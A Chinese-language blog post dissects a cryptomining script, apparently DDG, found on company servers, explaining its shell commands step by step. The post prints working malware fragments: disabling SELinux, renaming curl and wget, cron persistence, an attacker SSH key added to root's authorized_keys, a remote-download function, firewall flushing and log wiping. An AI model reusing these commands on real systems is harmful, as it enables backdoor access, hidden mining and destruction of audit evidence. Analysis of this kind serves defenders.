實力解剖一枚挖礦腳本，風騷操做亮瞎雙眼

原創：小姐姐味道（微信公衆號ID：xjjdog），歡迎分享，轉載請保留出處。

公司有幾臺機器，最近cpu一直在瘋轉，就像是吃了春藥，一直在發熱。因爲機器實在是太多，有這麼幾臺安全性防禦沒有到位，就一直躺在角落裏瘋狂運轉。

直到統一的監控腳本接管了這幾臺機器，異常狀況才得以浮出水面。最後發現了多個奇奇怪怪的進程，發現是一個挖礦腳本。下載下來學習了一下，發現腳本的編寫者，有着較高的水平。雖然在別人機器進行挖礦行爲是不道德的，但掩蓋不了腳本編寫者的風騷操做。

挖礦，是計算機技術界最讓人迷惑的行爲之一，但它賺錢。據悉，這段腳本名叫DDG，已經挖取了價值一千多萬人民幣的虛擬幣貨幣。

本着學習的目的，我稍微分析了一下這個神奇的腳本，也算是吸盡它的精華，爲我所用。這事我都沒敢告訴老闆，由於說了他也不懂，反生事端。不過和你們交流一下仍是能夠的，由於大家懂啊。

code 1

#!/bin/sh 複製代碼

腳本的第一行，看起來是一行註釋，但其實並非。它規定了接下來的腳本，將要採用哪個SHELL執行。像咱們日常用的bash、zsh等，屬於sh的超集，這個腳本使用sh做爲執行的shell，具備更好的可移植性。

code 2

setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
複製代碼

setenforce是Linux的selinux防火牆配置命令，執行setenforce 0 表示關閉selinux防火牆。2表明的是標準錯誤（stderr）的意思。因此後面，使用重定向符，將命令的錯誤輸出定向到/dev/null設備中。這個設備是一個虛擬設備，意思是什麼都不幹。很是適合靜悄悄的幹壞事。

code 3

sync && echo 3 >/proc/sys/vm/drop_caches
複製代碼

腳本貼心的幫咱們釋放了一些內存資源，以便獲取更多的資源進行挖礦。

衆所周知，Linux系統會隨着長時間的運行，會產生不少緩存，清理方式就是寫一個數字到drop_caches文件裏，這個數字一般爲3。sync命令將全部未寫的系統緩衝區寫到磁盤中，執行以後就能夠放心的釋放緩存了。

code 4

crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
複製代碼

沒錯，上面這些語句就是完成了一些普通的操做。值得注意的是，它把咱們的一些經常使用命令，使用mv命令給重名了。這在執行命令的時候，就會顯得分紅功能的蛋疼。這腳本已經更改了計算機的一些文件，屬於犯罪的範疇了。

腳本爲了複用一些功能，抽象出了不少的函數。咱們直接跳到main函數的執行，而後看一下這個過程。

code 5

首先是kill_miner_proc函數。代碼很長，就不所有貼出來了。

kill_miner_proc()
{
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  ...
    pkill -f biosetjenkins
    pkill -f Loopback
    ...
    crontab -r
    rm -rf /var/spool/cron/*
複製代碼

挖礦領域是一個相愛相殺的領域。這個方法首先使用ps、grep、kill一套組合，幹掉了同行的挖礦腳本，而後停掉了同行的cron腳本，黑吃黑的感受。

在這段腳本里，使用了pkill命令。這個命令會終止進程，並按終端號踢出用戶，比較暴力。

code 6

接下來執行的是kill_sus_proc函數。

ps axf -o "pid"|while read procid
do
...
done
複製代碼

ps加上o參數，能夠指定要輸出的列，在這裏只輸出的進程的pid，而後使用read函數，對procid進行遍歷操做。

code 7

ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
...
fi
複製代碼

上面就是遍歷操做過程了，咱們能夠看到if語句的語法。其中$?指的是上一個命令的退出狀態。0表示沒有錯誤，其餘任何值代表有錯誤。-ne是不等於的意思，意思就是可以匹配到tmp這個字符串。

code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
...
done
複製代碼

呵呵，上面又來了一次循環遍歷。不過此次針對的目標，是cpu使用超過40%的進程。讀過xjjdog對awk分析的同窗，對這個命令應該很是的熟悉。這就有點狠了：影響我挖礦的進程，都得死！

相煎何太急。

code 9

再接下來，腳本針對不一樣的用戶屬性，進行了不一樣的操做。

首先是root用戶。經過判斷是否存在$rtdir文件，來肯定是不是root權限。

chattr -i /etc/sysupdate*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/networkservice
複製代碼

使用chattr命令，把一些重要的文件，搞成不能任意改動的只讀屬性，也是夠損的。而後，操做cron程序，把腳本的更新服務加入到定時中。

就是下面這段腳本。

code 10

if [ ! -f "/usr/bin/crontab" ]
then
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
else
    [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
fi
複製代碼

注意[[ $cont =~ "update.sh" ]]這以小段代碼，怪異的很。[[ ]]是shell中內置的一個命令，支持字符串的模式匹配。使用=~的時候，甚至支持shell的正則表達式，強大的使人髮指。它的輸出結果是一個bool類型，因此可以使用||進行拼接。

然後面的單小括號 ()，是的是一個命令組，括號中多個命令之間用分號隔開，最後一個命令能夠沒有分號；和`cmd`的效果基本是同樣的。

code 11

搞完了定時任務，就要配置ssh自動登陸了，經過把公鑰追加到信任列表中就能夠。

chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/ oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+ 4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+ Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys
複製代碼

code 12

說曹操曹操就到，下面的腳本就使用了``進行操做。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
if [ "$filesize_config" -ne "$config_size" ]
then
    pkill -f sysupdate
    rm /etc/config.json
    downloads $config_url /etc/config.json $config_url_backup
else
    echo "no need download"
fi
複製代碼

經過一系列騷操做，獲取到配置文件的大小，若是判斷文件大小不一致，那麼就從新下載一個。這就用到了downloads函數。

shell中的函數，看起來比較怪異，後面的參數傳遞，就像是腳本傳遞同樣，傳送給函數。

code 13

downloads $config_url /etc/config.json $config_url_backup
複製代碼

這句話，就傳遞了三個參數。

固然，文件要從遙遠的服務器上下載。域名是.de結尾的，證實是個德國的域名，其餘的咱們一無所知。

downloads()
{
    if [ -f "/usr/bin/curl" ]
    then
    echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
    then
        wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}
複製代碼

我認爲，這段代碼做者寫的又臭又長，徹底沒有體現出本身應有的水平。應該是趕工期，沒有想好代碼的複用，纔會寫的這麼有失水準。

咱們上面說到，腳本改了幾個命令的名字，其中就有curl。這個命令是如此的強大，以致於腳本的做者都忍不住加了很多參數。

• -I 是用來測試http頭信息
• -m 設置最大傳輸時間
• -o 指定保持的文件名。這裏是/dev/null，呃呃呃
• -s 靜默模式。不輸出任何東西
• --connect-timeout 鏈接超時時間
• --retry 重試次數，好狠100次

若是沒有curl？那就使用替補的wget，套路都是同樣的。

code 14

接下來是一系列類似的操做，最後，對iptables一批操做。

iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
複製代碼

code 15

細心的腳本編寫者，還使用命令清理了操做日誌。

history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
複製代碼

不露死角，瀟灑走開。

能夠看到，且不說真正的挖礦程序，僅僅是這個小腳本，做者也下足了功夫。腳本里命令繁多，使用方式多樣，縮緊格式優雅，除了有一點囉嗦，沒有加密以外，是一個很是好的拿來學習的腳本。

瞧了瞧被控制的機器，我趕忙偷偷的重裝了機器。

就當它是一個夢吧。老闆問起的時候，什麼都沒有發生過。

有須要拿到完整腳本的同窗。關注xjjdog微信公衆號，回覆wkjb，便可獲取。

做者簡介：小姐姐味道 (xjjdog)，一個不容許程序員走彎路的公衆號。聚焦基礎架構和Linux。十年架構，日百億流量，與你探討高併發世界，給你不同的味道。個人我的微信xjjdog0，歡迎添加好友，​進一步交流。​